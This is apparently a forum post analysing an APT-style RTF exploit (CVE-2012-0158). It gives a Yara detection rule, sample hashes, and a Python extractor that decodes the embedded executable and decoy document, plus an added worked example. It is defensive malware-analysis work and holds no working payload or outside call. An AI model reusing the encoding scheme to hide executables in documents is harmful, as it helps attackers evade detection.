
w@rri0r@bh@y

Apt vitnam

Greets: "vinnu", "nightrover", "bond"

I used the name "VITNAM" because the decoy file had some contents from Vietnam. Here I have automated a process through which we can extract an executable from the RTF exploit.

Yara Rule:
Code:
rule APT_VITNAM {
  meta:
   author = "w@rri0r@bh@y"
  strings:
   $magic = "{\\rt"
   $v0 = "eb00eb1490905e33c980368746"
   $v1 = "1816685e99e2"
   $v2 = "\xD4\x39\x09\x63"
  condition:
   ($magic at 0) and (3 of ($v*))
}
Extractor For Shellcode:
Code:
"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"
This shellcode was used in the CVE-2012-0158 exploit.
Sample used:
SHA256: c072e309c087e496a8a72eb47eba9ce6d5708a6738dd1311eb3921f0f98fa461
MD5: 0b95c9d37e430a0b7b176b71fb65fc1a

I have written an automated script which can process lots of samples which have the same shellcode.
To use it, create a folder named "scan" and put the samples in it. The scan folder and the script should be in the same directory.

Extractor:
Code:
import os
import shutil
import binascii

# Python 3 version. The "scan", "comp", "nocomp" and "MZ" folders live next to
# the script; os.path.join keeps the paths valid on Windows and Linux.
base = os.getcwd()
scan = os.path.join(base, "scan")            # input samples
processed_file = os.path.join(base, "comp")  # samples that were decoded
nocomp = os.path.join(base, "nocomp")        # samples without the marker
MZ = os.path.join(base, "MZ")                # extracted executable and decoy

for folder in (processed_file, nocomp, MZ):
    os.makedirs(folder, exist_ok=True)

samples = os.listdir(scan)

# Encoded bytes that start the embedded executable in this sample family
# (the same value as $v2 in the Yara rule above).
MARKER = b"\xD4\x39\x09\x63"

def ror(byte, count):
    """Rotate an 8-bit value right by count bits."""
    return ((byte >> count) | (byte << (8 - count))) & 0xFF

def decode_vit(file_decrypt, file_size):
    """Decode two bytes at a time: rotate the first right by 4 bits
    (swap its nibbles) and XOR the second with 0x63."""
    complete_file = bytearray()
    for a in range(0, file_size - 1, 2):
        complete_file.append(ror(file_decrypt[a], 4))
        complete_file.append(file_decrypt[a + 1] ^ 0x63)
    return bytes(complete_file)

def mov_nocomp(sample):
    shutil.move(os.path.join(scan, sample), os.path.join(nocomp, sample))

def mov_processed_file(sample):
    shutil.move(os.path.join(scan, sample), os.path.join(processed_file, sample))

for sample in samples:
    with open(os.path.join(scan, sample), "rb") as f:
        fl = f.read()
    if fl[:4] != b"{\\rt":
        mov_nocomp(sample)
        continue
    found = fl.find(MARKER)
    print(found)
    if found == -1:
        mov_nocomp(sample)
        continue
    file_decrypt = fl[found:]
    file_size = len(file_decrypt)
    print(file_size)
    complete_file = decode_vit(file_decrypt, file_size)
    MZ_File = complete_file.find(b"MZ")
    data = binascii.unhexlify("D0CF11")  # start of the OLE2 (decoy .doc) header
    doc_file = complete_file.find(data)
    if MZ_File == -1 or doc_file == -1 or doc_file <= MZ_File:
        # marker found, but the decoded data does not split into PE + decoy
        mov_nocomp(sample)
        continue
    with open(os.path.join(MZ, sample + ".exe_"), "wb") as MZ_extraction:
        MZ_extraction.write(complete_file[MZ_File:doc_file])
    with open(os.path.join(MZ, sample + ".doc"), "wb") as doc_Extraction:
        doc_Extraction.write(complete_file[doc_file:])
    mov_processed_file(sample)
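The Yara string $v2 and the marker the extractor searches for are the same bytes, and the reason is that the encoding is an involution: applied to the DOS header "MZ\x90\x00" it yields \xD4\x39\x09\x63. The added example below (my own code, not from the original post) derives the marker from that known plaintext, runs the extraction on a constructed RTF-like buffer containing a fake executable and fake decoy, and checks the full 8-byte OLE2 signature rather than only D0CF11; OLE2_MAGIC, FAKE_PE, FAKE_DOC and SAMPLE are constructed for the demo.

```python
# Added example, not part of the original post. It checks that the Yara
# marker $v2 is the encoded DOS header "MZ\x90\x00" and runs the full
# extraction on a constructed buffer.
OLE2_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"  # full compound-document signature
MARKER = b"\xD4\x39\x09\x63"                      # $v2 from the Yara rule

def ror8(b, n):
    """Rotate an 8-bit value right by n bits."""
    return ((b >> n) | (b << (8 - n))) & 0xFF

def vit_transform(buf):
    """Per byte pair: nibble-swap the first byte, XOR the second with 0x63.
    Both steps undo themselves, so one function both encodes and decodes."""
    out = bytearray()
    for a in range(0, len(buf) - 1, 2):
        out.append(ror8(buf[a], 4))
        out.append(buf[a + 1] ^ 0x63)
    return bytes(out)

def marker_for(plaintext):
    """Derive a scanner marker from a known plaintext prefix."""
    return vit_transform(plaintext)

def extract(rtf):
    """Return (pe_bytes, decoy_bytes), or None if the sample does not match."""
    if rtf[:4] != b"{\\rt":
        return None
    found = rtf.find(MARKER)
    if found == -1:
        return None
    decoded = vit_transform(rtf[found:])
    doc_off = decoded.find(OLE2_MAGIC)
    # The marker decodes to "MZ", so the PE begins at offset 0 of decoded.
    if doc_off == -1 or not decoded.startswith(b"MZ"):
        return None
    return decoded[:doc_off], decoded[doc_off:]

# Constructed test data: fake PE and fake decoy, encoded inside an RTF shell.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 20
FAKE_DOC = OLE2_MAGIC + b"\x11" * 10
SAMPLE = b"{\\rtf1 constructed sample " + vit_transform(FAKE_PE + FAKE_DOC) + b"}"

if __name__ == "__main__":
    assert marker_for(b"MZ\x90\x00") == MARKER
    pe, doc = extract(SAMPLE)
    print(len(pe), len(doc))  # 24 18
```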

Updated 03-20-2015 at 02:35 PM by [s]
